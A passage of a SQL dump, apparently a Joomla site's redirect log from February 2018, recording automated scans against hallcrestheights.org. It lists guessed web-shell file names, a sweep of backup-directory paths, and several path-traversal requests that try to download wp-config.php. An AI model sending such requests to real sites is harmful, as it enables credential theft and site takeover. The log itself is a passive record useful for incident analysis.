00:00:00'),(13652,'http://hallcrestheights.org/xmlrpc/dlrejt.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:07:22','0000-00-00 00:00:00'),(13653,'http://hallcrestheights.org/libraries/pattemplate/sffsr.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:15:15','0000-00-00 00:00:00'),(13654,'http://hallcrestheights.org/components/com_comprofiler/plugin/templates/plmrmb.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:20:24','0000-00-00 00:00:00'),(13655,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/paste/js/ojkgh.php',NULL,'http://site.ru','',2,0,'2018-02-01 22:23:52','0000-00-00 00:00:00'),(13656,'http://hallcrestheights.org/templates/yoo_square/images/widgetkit/white/pafycx.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:32:21','0000-00-00 00:00:00'),(13657,'http://hallcrestheights.org/plugins/content/sigplus/engines/slimbox2/js/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:34:48','0000-00-00 00:00:00'),(13658,'http://hallcrestheights.org/templates/beez3/html/com_contact/contact/update.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:38:05','0000-00-00 00:00:00'),(13659,'http://hallcrestheights.org/tmp/install_4ffcb135841c9/lt-LT/dqrro.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:40:46','0000-00-00 00:00:00'),(13660,'http://hallcrestheights.org/templates/blue-lotus/html/com_search/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:06:58','0000-00-00 00:00:00'),(13661,'http://hallcrestheights.org/components/com_banners/models/Dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:09:35','0000-00-00 00:00:00'),(13662,'http://hallcrestheights.org/images/ylkdjl.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:14:43','0000-00-00 00:00:00'),(13663,'http://hallcrestheights.org/tmp/ckdbf.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:16:41','0000-00-00 00:00:00'),(13664,'http://hallcrestheights.org/tmp/com_virtuemart_update/components/com_virtuemart/views/cart/dceal.php',NULL,'http://site.ru','',2,0,'2018-02-01 23:16:44','0000-00-00 00:00:00'),(13665,'http://hallcrestheights.org/wp-press.php',NULL,'http://site.ru','',1,0,'2018-02-01 23:18:33','0000-00-00 00:00:00'),(13666,'http://hallcrestheights.org/includes/account-validation/File/file.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:11:19','0000-00-00 00:00:00'),(13667,'http://hallcrestheights.org/templates/yoo_bigeasy/styles/blue/images/tools/plmrmb.php',NULL,'http://site.ru','',2,0,'2018-02-02 00:27:24','0000-00-00 00:00:00'),(13668,'http://hallcrestheights.org/libraries/simplepie/idn/kuxel.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:49:48','0000-00-00 00:00:00'),(13669,'http://hallcrestheights.org/joomla/modules/mod_poll/tmpl/debug.php',NULL,'http://site.ru','',2,0,'2018-02-02 00:52:38','0000-00-00 00:00:00'),(13670,'http://hallcrestheights.org/templates/default/language/sql-on.php',NULL,'http://site.ru','',1,0,'2018-02-02 00:58:27','0000-00-00 00:00:00'),(13671,'http://hallcrestheights.org/media/editors/tinymce/plugins/code/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:02:32','0000-00-00 00:00:00'),(13672,'http://hallcrestheights.org/templates/yoo_bigeasy/warp/systems/joomla.1.7/menus/mhhrx.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:03:55','0000-00-00 00:00:00'),(13673,'http://hallcrestheights.org/templates/protostar/images/system/c.php',NULL,'http://site.ru','',2,0,'2018-02-02 01:04:36','0000-00-00 00:00:00'),(13674,'http://hallcrestheights.org/tmp/install_4ffcb135841c9/sv-SE/jhwtxu.php',NULL,'http://site.ru','',1,0,'2018-02-02 01:55:03','0000-00-00 00:00:00'),(13675,'http://hallcrestheights.org/libraries/joomla/application/WSO789.php',NULL,'http://site.ru','',1,0,'2018-02-02 02:50:56','0000-00-00 00:00:00'),(13676,'http://hallcrestheights.org/modules/mod_myblog_archive/mod_myblog_archive1.php',NULL,'http://site.ru','',2,0,'2018-02-02 03:43:10','0000-00-00 00:00:00'),(13677,'http://hallcrestheights.org/modules/mod_roknavmenu/themes/fusion/js/sky.php',NULL,'http://site.ru','',1,0,'2018-02-02 03:44:47','0000-00-00 00:00:00'),(13678,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/sky.php',NULL,'http://site.ru','',1,0,'2018-02-02 03:47:12','0000-00-00 00:00:00'),(13679,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/plugins/media/langs/server-sql.php',NULL,'http://site.ru','',2,0,'2018-02-02 04:02:59','0000-00-00 00:00:00'),(13680,'http://hallcrestheights.org/modules/mod_breadcrumbs/lomnw.php',NULL,'http://site.ru','',4,0,'2018-02-02 04:08:39','0000-00-00 00:00:00'),(13681,'http://hallcrestheights.org/microsoft1/account-validation/File/file.php',NULL,'http://site.ru','',1,0,'2018-02-02 04:39:40','0000-00-00 00:00:00'),(13682,'http://hallcrestheights.org/cli/lastupdate.php',NULL,'http://site.ru','',1,0,'2018-02-02 05:20:58','0000-00-00 00:00:00'),(13683,'http://hallcrestheights.org/old/libraries/system_info.php',NULL,'http://site.ru','',1,0,'2018-02-02 05:24:28','0000-00-00 00:00:00'),(13684,'http://hallcrestheights.org/modules/mod_workfromhome/mod_workfromhome.php',NULL,'http://site.ru','',2,0,'2018-02-02 05:56:54','0000-00-00 00:00:00'),(13685,'http://hallcrestheights.org/modules/mod_poll/tmpl/my.php',NULL,'http://site.ru','',2,0,'2018-02-02 05:57:09','0000-00-00 00:00:00'),(13686,'http://hallcrestheights.org/templates/beez5/fso.php',NULL,'http://site.ru','',2,0,'2018-02-02 06:03:00','0000-00-00 00:00:00'),(13687,'http://hallcrestheights.org/live/account-validation/File/file.php',NULL,'http://site.ru','',1,0,'2018-02-02 06:22:06','0000-00-00 00:00:00'),(13688,'http://hallcrestheights.org/language/en-GB/bctsd.php',NULL,'http://site.ru','',2,0,'2018-02-02 06:59:48','0000-00-00 00:00:00'),(13689,'http://hallcrestheights.org/plugins/editors/jckeditor/skins/office2007/images/Dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-02 07:06:13','0000-00-00 00:00:00'),(13690,'http://hallcrestheights.org/editor/zlrzvnb.php',NULL,'http://site.ru','',2,0,'2018-02-02 07:10:59','0000-00-00 00:00:00'),(13691,'http://hallcrestheights.org/a-backup/',NULL,'','',1,0,'2018-02-02 07:34:28','0000-00-00 00:00:00'),(13692,'http://hallcrestheights.org/adm/backup/',NULL,'','',1,0,'2018-02-02 07:34:30','0000-00-00 00:00:00'),(13693,'http://hallcrestheights.org/adm/backupbd/',NULL,'','',1,0,'2018-02-02 07:34:34','0000-00-00 00:00:00'),(13694,'http://hallcrestheights.org/admbackup/',NULL,'','',1,0,'2018-02-02 07:33:15','0000-00-00 00:00:00'),(13695,'http://hallcrestheights.org/admbackupbd/',NULL,'','',1,0,'2018-02-02 07:33:17','0000-00-00 00:00:00'),(13696,'http://hallcrestheights.org/admbackups/',NULL,'','',1,0,'2018-02-02 07:34:40','0000-00-00 00:00:00'),(13697,'http://hallcrestheights.org/admin/backup/',NULL,'','',1,0,'2018-02-02 07:34:44','0000-00-00 00:00:00'),(13698,'http://hallcrestheights.org/admin/backupbd/',NULL,'','',1,0,'2018-02-02 07:34:47','0000-00-00 00:00:00'),(13699,'http://hallcrestheights.org/admin/backupp/',NULL,'','',1,0,'2018-02-02 07:34:48','0000-00-00 00:00:00'),(13700,'http://hallcrestheights.org/admin/backuppma/',NULL,'','',1,0,'2018-02-02 07:33:29','0000-00-00 00:00:00'),(13701,'http://hallcrestheights.org/adminbackup/',NULL,'','',1,0,'2018-02-02 07:34:53','0000-00-00 00:00:00'),(13702,'http://hallcrestheights.org/adminbackupbd/',NULL,'','',1,0,'2018-02-02 07:33:34','0000-00-00 00:00:00'),(13703,'http://hallcrestheights.org/adminbackupp/',NULL,'','',1,0,'2018-02-02 07:34:57','0000-00-00 00:00:00'),(13704,'http://hallcrestheights.org/adminbackuppma/',NULL,'','',1,0,'2018-02-02 07:35:01','0000-00-00 00:00:00'),(13705,'http://hallcrestheights.org/adminbackups/',NULL,'','',1,0,'2018-02-02 07:35:04','0000-00-00 00:00:00'),(13706,'http://hallcrestheights.org/adminbd/',NULL,'','',1,0,'2018-02-02 07:35:05','0000-00-00 00:00:00'),(13707,'http://hallcrestheights.org/administratorbackup/',NULL,'','',1,0,'2018-02-02 07:35:13','0000-00-00 00:00:00'),(13708,'http://hallcrestheights.org/administratorbackupbd/',NULL,'','',1,0,'2018-02-02 07:33:54','0000-00-00 00:00:00'),(13709,'http://hallcrestheights.org/administratorbackups/',NULL,'','',1,0,'2018-02-02 07:35:17','0000-00-00 00:00:00'),(13710,'http://hallcrestheights.org/SQL-Backups/',NULL,'','',1,0,'2018-02-02 07:35:18','0000-00-00 00:00:00'),(13711,'http://hallcrestheights.org/automysqlbackup/',NULL,'','',1,0,'2018-02-02 07:35:19','0000-00-00 00:00:00'),(13712,'http://hallcrestheights.org/backup/backup/',NULL,'','',1,0,'2018-02-02 07:34:00','0000-00-00 00:00:00'),(13713,'http://hallcrestheights.org/backup/sql/',NULL,'','',1,0,'2018-02-02 07:35:23','0000-00-00 00:00:00'),(13714,'http://hallcrestheights.org/backup_recovery/',NULL,'','',1,0,'2018-02-02 07:35:24','0000-00-00 00:00:00'),(13715,'http://hallcrestheights.org/backup_server/',NULL,'','',1,0,'2018-02-02 07:35:25','0000-00-00 00:00:00'),(13716,'http://hallcrestheights.org/backupbackup/',NULL,'','',1,0,'2018-02-02 07:34:06','0000-00-00 00:00:00'),(13717,'http://hallcrestheights.org/backupbd/',NULL,'','',1,0,'2018-02-02 07:35:30','0000-00-00 00:00:00'),(13718,'http://hallcrestheights.org/backupdatabase/',NULL,'','',1,0,'2018-02-02 07:35:31','0000-00-00 00:00:00'),(13719,'http://hallcrestheights.org/backupfolder/',NULL,'','',1,0,'2018-02-02 07:35:32','0000-00-00 00:00:00'),(13720,'http://hallcrestheights.org/backupmysql/',NULL,'','',1,0,'2018-02-02 07:35:34','0000-00-00 00:00:00'),(13721,'http://hallcrestheights.org/backup-mysql/',NULL,'','',1,0,'2018-02-02 07:34:16','0000-00-00 00:00:00'),(13722,'http://hallcrestheights.org/backupp/',NULL,'','',1,0,'2018-02-02 07:34:18','0000-00-00 00:00:00'),(13723,'http://hallcrestheights.org/backuppma/',NULL,'','',1,0,'2018-02-02 07:35:41','0000-00-00 00:00:00'),(13724,'http://hallcrestheights.org/backups/',NULL,'','',1,0,'2018-02-02 07:34:21','0000-00-00 00:00:00'),(13725,'http://hallcrestheights.org/backupsdatabase/',NULL,'','',1,0,'2018-02-02 07:35:44','0000-00-00 00:00:00'),(13726,'http://hallcrestheights.org/backupsql/',NULL,'','',1,0,'2018-02-02 07:35:46','0000-00-00 00:00:00'),(13727,'http://hallcrestheights.org/backupssql/',NULL,'','',1,0,'2018-02-02 07:35:48','0000-00-00 00:00:00'),(13728,'http://hallcrestheights.org/bd/',NULL,'','',1,0,'2018-02-02 07:34:29','0000-00-00 00:00:00'),(13729,'http://hallcrestheights.org/bin/backup/',NULL,'','',1,0,'2018-02-02 07:35:53','0000-00-00 00:00:00'),(13730,'http://hallcrestheights.org/binbackup/',NULL,'','',1,0,'2018-02-02 07:34:33','0000-00-00 00:00:00'),(13731,'http://hallcrestheights.org/binbackups/',NULL,'','',1,0,'2018-02-02 07:35:56','0000-00-00 00:00:00'),(13732,'http://hallcrestheights.org/data_backup/',NULL,'','',1,0,'2018-02-02 07:34:37','0000-00-00 00:00:00'),(13733,'http://hallcrestheights.org/databackup/',NULL,'','',1,0,'2018-02-02 07:36:01','0000-00-00 00:00:00'),(13734,'http://hallcrestheights.org/databasebackup/',NULL,'','',1,0,'2018-02-02 07:36:06','0000-00-00 00:00:00'),(13735,'http://hallcrestheights.org/databasebackups/',NULL,'','',1,0,'2018-02-02 07:34:47','0000-00-00 00:00:00'),(13736,'http://hallcrestheights.org/db3/',NULL,'','',1,0,'2018-02-02 07:34:50','0000-00-00 00:00:00'),(13737,'http://hallcrestheights.org/download/',NULL,'','',1,0,'2018-02-02 07:36:13','0000-00-00 00:00:00'),(13738,'http://hallcrestheights.org/jdb/',NULL,'','',1,0,'2018-02-02 07:36:14','0000-00-00 00:00:00'),(13739,'http://hallcrestheights.org/mssql/',NULL,'','',1,0,'2018-02-02 07:36:16','0000-00-00 00:00:00'),(13740,'http://hallcrestheights.org/mssql/backup/',NULL,'','',1,0,'2018-02-02 07:36:18','0000-00-00 00:00:00'),(13741,'http://hallcrestheights.org/mssqlbackup/',NULL,'','',1,0,'2018-02-02 07:36:18','0000-00-00 00:00:00'),(13742,'http://hallcrestheights.org/myadmin/backup/',NULL,'','',1,0,'2018-02-02 07:34:58','0000-00-00 00:00:00'),(13743,'http://hallcrestheights.org/myadminbackup/',NULL,'','',1,0,'2018-02-02 07:36:21','0000-00-00 00:00:00'),(13744,'http://hallcrestheights.org/myadminbackups/',NULL,'','',1,0,'2018-02-02 07:36:22','0000-00-00 00:00:00'),(13745,'http://hallcrestheights.org/mysql/backup/',NULL,'','',1,0,'2018-02-02 07:36:25','0000-00-00 00:00:00'),(13746,'http://hallcrestheights.org/mysqlbackup/',NULL,'','',1,0,'2018-02-02 07:35:05','0000-00-00 00:00:00'),(13747,'http://hallcrestheights.org/mysqldump/',NULL,'','',1,0,'2018-02-02 07:36:27','0000-00-00 00:00:00'),(13748,'http://hallcrestheights.org/old/',NULL,'','',1,0,'2018-02-02 07:36:29','0000-00-00 00:00:00'),(13749,'http://hallcrestheights.org/old/backup/',NULL,'','',1,0,'2018-02-02 07:36:30','0000-00-00 00:00:00'),(13750,'http://hallcrestheights.org/oldbackup/',NULL,'','',1,0,'2018-02-02 07:36:33','0000-00-00 00:00:00'),(13751,'http://hallcrestheights.org/phpmyadmin/backup/',NULL,'','',1,0,'2018-02-02 07:35:16','0000-00-00 00:00:00'),(13752,'http://hallcrestheights.org/phpmyadminbackup/',NULL,'','',1,0,'2018-02-02 07:35:20','0000-00-00 00:00:00'),(13753,'http://hallcrestheights.org/phpmyadminbackups/',NULL,'','',1,0,'2018-02-02 07:35:23','0000-00-00 00:00:00'),(13754,'http://hallcrestheights.org/pma/backup/',NULL,'','',1,0,'2018-02-02 07:35:26','0000-00-00 00:00:00'),(13755,'http://hallcrestheights.org/pmabackup/',NULL,'','',1,0,'2018-02-02 07:36:49','0000-00-00 00:00:00'),(13756,'http://hallcrestheights.org/pmabackups/',NULL,'','',1,0,'2018-02-02 07:36:51','0000-00-00 00:00:00'),(13757,'http://hallcrestheights.org/securebackup/',NULL,'','',1,0,'2018-02-02 07:37:24','0000-00-00 00:00:00'),(13758,'http://hallcrestheights.org/secure-backup/',NULL,'','',1,0,'2018-02-02 07:37:26','0000-00-00 00:00:00'),(13759,'http://hallcrestheights.org/sql/backup/',NULL,'','',1,0,'2018-02-02 07:37:29','0000-00-00 00:00:00'),(13760,'http://hallcrestheights.org/sqlbackup/',NULL,'','',1,0,'2018-02-02 07:37:31','0000-00-00 00:00:00'),(13761,'http://hallcrestheights.org/sqlbackups/',NULL,'','',1,0,'2018-02-02 07:37:35','0000-00-00 00:00:00'),(13762,'http://hallcrestheights.org/sqldata/',NULL,'','',1,0,'2018-02-02 07:36:15','0000-00-00 00:00:00'),(13763,'http://hallcrestheights.org/sqlite/',NULL,'','',1,0,'2018-02-02 07:36:16','0000-00-00 00:00:00'),(13764,'http://hallcrestheights.org/sqlite3/',NULL,'','',1,0,'2018-02-02 07:37:39','0000-00-00 00:00:00'),(13765,'http://hallcrestheights.org/sypex/backup/',NULL,'','',1,0,'2018-02-02 07:36:21','0000-00-00 00:00:00'),(13766,'http://hallcrestheights.org/sypexbackup/',NULL,'','',1,0,'2018-02-02 07:36:24','0000-00-00 00:00:00'),(13767,'http://hallcrestheights.org/sypexbackups/',NULL,'','',1,0,'2018-02-02 07:36:26','0000-00-00 00:00:00'),(13768,'http://hallcrestheights.org/sys/backup/',NULL,'','',1,0,'2018-02-02 07:37:50','0000-00-00 00:00:00'),(13769,'http://hallcrestheights.org/sysbackup/',NULL,'','',1,0,'2018-02-02 07:37:52','0000-00-00 00:00:00'),(13770,'http://hallcrestheights.org/system/backup/',NULL,'','',1,0,'2018-02-02 07:37:56','0000-00-00 00:00:00'),(13771,'http://hallcrestheights.org/systembackup/',NULL,'','',1,0,'2018-02-02 07:38:00','0000-00-00 00:00:00'),(13772,'http://hallcrestheights.org/systembackups/',NULL,'','',1,0,'2018-02-02 07:38:03','0000-00-00 00:00:00'),(13773,'http://hallcrestheights.org/systembd/',NULL,'','',1,0,'2018-02-02 07:38:06','0000-00-00 00:00:00'),(13774,'http://hallcrestheights.org/userbackup/',NULL,'','',1,0,'2018-02-02 07:38:09','0000-00-00 00:00:00'),(13775,'http://hallcrestheights.org/wp-content/backup/',NULL,'','',1,0,'2018-02-02 07:36:51','0000-00-00 00:00:00'),(13776,'http://hallcrestheights.org/wp-contentbackup/',NULL,'','',1,0,'2018-02-02 07:38:15','0000-00-00 00:00:00'),(13777,'http://hallcrestheights.org/media/cloud.php',NULL,'','',3,0,'2018-02-03 04:08:01','0000-00-00 00:00:00'),(13778,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/mds_v3.php',NULL,'','',3,0,'2018-02-03 04:09:57','0000-00-00 00:00:00'),(13779,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/contextmenu/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 11:43:15','0000-00-00 00:00:00'),(13780,'http://hallcrestheights.org/components/com_mailto/views/sent/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 13:23:14','0000-00-00 00:00:00'),(13781,'http://hallcrestheights.org/modules/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-03 15:25:52','0000-00-00 00:00:00'),(13782,'http://hallcrestheights.org/libraries/joomla/filesystem/meta/language/config.php',NULL,'http://site.ru','',1,0,'2018-02-03 15:27:37','0000-00-00 00:00:00'),(13783,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/directionality/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 15:27:52','0000-00-00 00:00:00'),(13784,'http://hallcrestheights.org/install/models.php',NULL,'http://site.ru','',1,0,'2018-02-03 19:51:06','0000-00-00 00:00:00'),(13785,'http://hallcrestheights.org/templates/beez/html/com_content/section/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 20:26:17','0000-00-00 00:00:00'),(13786,'http://hallcrestheights.org/home.php',NULL,'http://site.ru','',1,0,'2018-02-03 20:26:37','0000-00-00 00:00:00'),(13787,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/style/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-03 21:20:18','0000-00-00 00:00:00'),(13788,'http://hallcrestheights.org/modules/mod_fxprev/libraries/content-post.php',NULL,'http://site.ru','',3,0,'2018-02-03 21:37:28','0000-00-00 00:00:00'),(13789,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/flash/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-03 22:18:38','0000-00-00 00:00:00'),(13790,'http://hallcrestheights.org/language/system.php',NULL,'http://site.ru','',1,0,'2018-02-04 00:04:43','0000-00-00 00:00:00'),(13791,'http://hallcrestheights.org/components/com_wrapper/views/wrapper/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 00:45:32','0000-00-00 00:00:00'),(13792,'http://hallcrestheights.org/components/com_poll/views/poll/tmpl/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 06:15:22','0000-00-00 00:00:00'),(13793,'http://hallcrestheights.org/templates/beez/html/com_content/article/conflg.php',NULL,'http://site.ru','',3,0,'2018-02-04 06:17:50','0000-00-00 00:00:00'),(13794,'http://hallcrestheights.org/components/com_contact/views/categories/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-04 07:13:06','0000-00-00 00:00:00'),(13795,'http://hallcrestheights.org/templates/beez/html/com_poll/poll/conflg.php',NULL,'http://site.ru','',2,0,'2018-02-04 09:12:15','0000-00-00 00:00:00'),(13796,'http://hallcrestheights.org/libraries/joomla/document/html/renderer/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 10:11:01','0000-00-00 00:00:00'),(13797,'http://hallcrestheights.org/cli/w.php',NULL,'http://site.ru','',1,0,'2018-02-04 10:28:24','0000-00-00 00:00:00'),(13798,'http://hallcrestheights.org/templates/beez/html/com_content/category/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-04 10:32:50','0000-00-00 00:00:00'),(13799,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/preview/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 13:10:44','0000-00-00 00:00:00'),(13800,'http://hallcrestheights.org/templates/beez/html/com_content/article/thumbs.php',NULL,'http://site.ru','',2,0,'2018-02-04 13:13:56','0000-00-00 00:00:00'),(13801,'http://hallcrestheights.org/plugins/user/user.php',NULL,'http://site.ru','',1,0,'2018-02-04 13:59:54','0000-00-00 00:00:00'),(13802,'http://hallcrestheights.org/templates/atomic/kd.php',NULL,'http://site.ru','',1,0,'2018-02-04 14:56:02','0000-00-00 00:00:00'),(13803,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advimage/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-04 15:38:52','0000-00-00 00:00:00'),(13804,'http://hallcrestheights.org/images/log.php',NULL,'http://site.ru','',1,0,'2018-02-04 15:58:57','0000-00-00 00:00:00'),(13805,'http://hallcrestheights.org/sph.php',NULL,'hallcrestheights.org','',1,0,'2018-02-05 19:01:18','0000-00-00 00:00:00'),(13806,'http://hallcrestheights.org/cache/iph.php',NULL,'hallcrestheights.org','',1,0,'2018-02-05 19:05:13','0000-00-00 00:00:00'),(13807,'http://hallcrestheights.org/inlos.php',NULL,'hallcrestheights.org','',1,0,'2018-02-05 19:06:57','0000-00-00 00:00:00'),(13808,'http://hallcrestheights.org/blog//wp-login.php',NULL,'','',1,0,'2018-02-05 22:46:20','0000-00-00 00:00:00'),(13809,'http://hallcrestheights.org/wordpress//wp-login.php',NULL,'','',1,0,'2018-02-05 22:46:21','0000-00-00 00:00:00'),(13810,'http://hallcrestheights.org/wp//wp-login.php',NULL,'','',1,0,'2018-02-05 22:46:21','0000-00-00 00:00:00'),(13811,'http://hallcrestheights.org/XAttacker.php?X=Attacker',NULL,'','',4,0,'2018-02-07 03:35:28','0000-00-00 00:00:00'),(13812,'http://www.hallcrestheights.org/components/com_jimtawl/jimtawl.php',NULL,'','',1,0,'2018-02-07 14:01:32','0000-00-00 00:00:00'),(13813,'http://hallcrestheights.org/df.php',NULL,'http://site.ru','',1,0,'2018-02-08 07:27:47','0000-00-00 00:00:00'),(13814,'http://hallcrestheights.org/libraries/knGH.php',NULL,'http://site.ru','',1,0,'2018-02-08 07:28:20','0000-00-00 00:00:00'),(13815,'http://hallcrestheights.org/generationmap.php',NULL,'http://site.ru','',1,0,'2018-02-08 07:33:55','0000-00-00 00:00:00'),(13816,'http://hallcrestheights.org/language/de-DE/1.php',NULL,'http://site.ru','',2,0,'2018-02-08 08:31:02','0000-00-00 00:00:00'),(13817,'http://hallcrestheights.org/v3.php',NULL,'http://site.ru','',1,0,'2018-02-08 09:02:58','0000-00-00 00:00:00'),(13818,'http://hallcrestheights.org/miwed.php',NULL,'http://site.ru','',1,0,'2018-02-08 09:07:10','0000-00-00 00:00:00'),(13819,'http://hallcrestheights.org/532299.php',NULL,'http://site.ru','',2,0,'2018-02-08 10:00:17','0000-00-00 00:00:00'),(13820,'http://hallcrestheights.org/index8632.php',NULL,'http://site.ru','',2,0,'2018-02-08 10:39:34','0000-00-00 00:00:00'),(13821,'http://hallcrestheights.org/components/error.php',NULL,'http://site.ru','',1,0,'2018-02-08 12:04:08','0000-00-00 00:00:00'),(13822,'http://hallcrestheights.org/components/gif.php',NULL,'http://site.ru','',1,0,'2018-02-08 12:23:48','0000-00-00 00:00:00'),(13823,'http://hallcrestheights.org/plugins/authentication/config.php',NULL,'http://site.ru','',1,0,'2018-02-08 13:01:11','0000-00-00 00:00:00'),(13824,'http://hallcrestheights.org/libraries/joomla/github/extras.php',NULL,'http://site.ru','',1,0,'2018-02-08 13:01:16','0000-00-00 00:00:00'),(13825,'http://hallcrestheights.org/hello.php',NULL,'http://site.ru','',1,0,'2018-02-08 13:52:05','0000-00-00 00:00:00'),(13826,'http://hallcrestheights.org/log.php',NULL,'http://site.ru','',4,0,'2018-02-08 14:35:25','0000-00-00 00:00:00'),(13827,'http://hallcrestheights.org/components/com_foxcontact/uploads/ly.php',NULL,'http://site.ru','',2,0,'2018-02-08 14:36:47','0000-00-00 00:00:00'),(13828,'http://hallcrestheights.org/eladm.php',NULL,'http://site.ru','',2,0,'2018-02-08 14:37:33','0000-00-00 00:00:00'),(13829,'http://hallcrestheights.org/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download',NULL,'','',1,0,'2018-02-08 14:38:49','0000-00-00 00:00:00'),(13830,'http://hallcrestheights.org/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php',NULL,'','',1,0,'2018-02-08 14:39:16','0000-00-00 00:00:00'),(13831,'http://hallcrestheights.org/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php',NULL,'','',1,0,'2018-02-08 14:39:22','0000-00-00 00:00:00'),(13832,'http://hallcrestheights.org/components/com_foxcontact/6.php',NULL,'http://site.ru','',1,0,'2018-02-08 14:38:37','0000-00-00 00:00:00'),(13833,'http://hallcrestheights.org/aul.php',NULL,'http://site.ru','',2,0,'2018-02-08 16:22:18','0000-00-00 00:00:00'),(13834,'http://hallcrestheights.org/components/com_foxcontact/wso.php',NULL,'http://site.ru','',1,0,'2018-02-08 16:56:27','0000-00-00 00:00:00'),(13835,'http://hallcrestheights.org/libraries/legacy/contacts.php',NULL,'http://site.ru','',1,0,'2018-02-08 17:05:17','0000-00-00 00:00:00'),(13836,'http://hallcrestheights.org/wp-logout.php',NULL,'http://site.ru','',1,0,'2018-02-08 17:09:10','0000-00-00 00:00:00'),(13837,'http://hallcrestheights.org/modules/mod_objects/library/object.php',NULL,'http://site.ru','',2,0,'2018-02-08 17:10:13','0000-00-00 00:00:00'),(13838,'http://hallcrestheights.org/plugins/admin.php',NULL,'http://site.ru','',1,0,'2018-02-08 17:55:32','0000-00-00 00:00:00'),(13839,'http://hallcrestheights.org/wp-api.php',NULL,'http://site.ru','',1,0,'2018-02-08 18:36:17','0000-00-00 00:00:00'),(13840,'http://hallcrestheights.org/language/en-GB/1.php',NULL,'http://site.ru','',2,0,'2018-02-08 18:41:48','0000-00-00 00:00:00'),(13841,'http://hallcrestheights.org/components/com_foxcontact/e.php',NULL,'http://site.ru','',1,0,'2018-02-09 01:38:00','0000-00-00 00:00:00'),(13842,'http://hallcrestheights.org/components/com_foxcontact/d.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:06:17','0000-00-00 00:00:00'),(13843,'http://hallcrestheights.org/db-config.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:06:37','0000-00-00 00:00:00'),(13844,'http://hallcrestheights.org/class-wp-defaults.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:12:13','0000-00-00 00:00:00'),(13845,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/help.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:53:10','0000-00-00 00:00:00'),(13846,'http://hallcrestheights.org/media/editors/codemirror/mode/octave/putenv.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:58:27','0000-00-00 00:00:00'),(13847,'http://hallcrestheights.org/layouts/joomla/content/info_block/bass.php',NULL,'http://site.ru','',1,0,'2018-02-09 04:36:50','0000-00-00 00:00:00'),(13848,'http://hallcrestheights.org/plugins/editors/css.php',NULL,'http://site.ru','',1,0,'2018-02-09 04:38:22','0000-00-00 00:00:00'),(13849,'http://hallcrestheights.org/j15/administrator/components/com_weblinks/sql-omn.php',NULL,'http://site.ru','',1,0,'2018-02-09 04:48:57','0000-00-00 00:00:00'),(13850,'http://hallcrestheights.org/libraries/idna_convert/mod.php',NULL,'http://site.ru','',1,0,'2018-02-09 05:22:44','0000-00-00 00:00:00'),(13851,'http://hallcrestheights.org/bin/logs.php',NULL,'http://site.ru','',1,0,'2018-02-09 05:22:50','0000-00-00 00:00:00'),(13852,'http://hallcrestheights.org/cache/error.php',NULL,'http://site.ru','',2,0,'2018-02-09 06:10:38','0000-00-00 00:00:00'),(13853,'http://hallcrestheights.org/tmp/abc.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:44:08','0000-00-00 00:00:00'),(13854,'http://hallcrestheights.org/components/com_content/models/classes.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:49:48','0000-00-00 00:00:00'),(13855,'http://hallcrestheights.org/plugins/captcha/admin.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:54:49','0000-00-00 00:00:00'),(13856,'http://hallcrestheights.org/ajax-requests.new.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:58:04','0000-00-00 00:00:00'),(13857,'http://hallcrestheights.org/components/com_foxcontact/tim.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:57:37','0000-00-00 